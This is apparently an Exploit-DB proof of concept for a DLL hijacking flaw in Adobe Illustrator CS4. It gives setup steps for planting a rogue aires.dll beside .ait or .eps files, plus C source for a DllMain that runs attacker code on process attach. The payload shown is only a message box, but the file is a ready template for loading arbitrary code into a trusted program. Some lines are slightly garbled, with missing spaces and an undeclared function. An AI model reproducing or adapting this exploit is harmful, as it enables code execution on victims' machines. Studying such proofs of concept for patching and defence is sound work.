1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 |
/* Exploit Title: Adobe Illustrator CS4 DLL Hijacking Exploit (aires.dll) Date: August 25, 2010 Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) Version: CS4 v14.0.0 Tested on: Windows 7 x64 Ultimate Vulnerable extensions: .ait .eps Greetz: Astalavista, OffSEC, Exploit-DB Note: Create folders system\enu_us and put aires.dll */ #include <windows.h> BOOL WINAPI DllMain ( HANDLEhinstDLL, DWORD fdwReason, LPVOIDlpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_hijack(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_hijack() { MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK); } |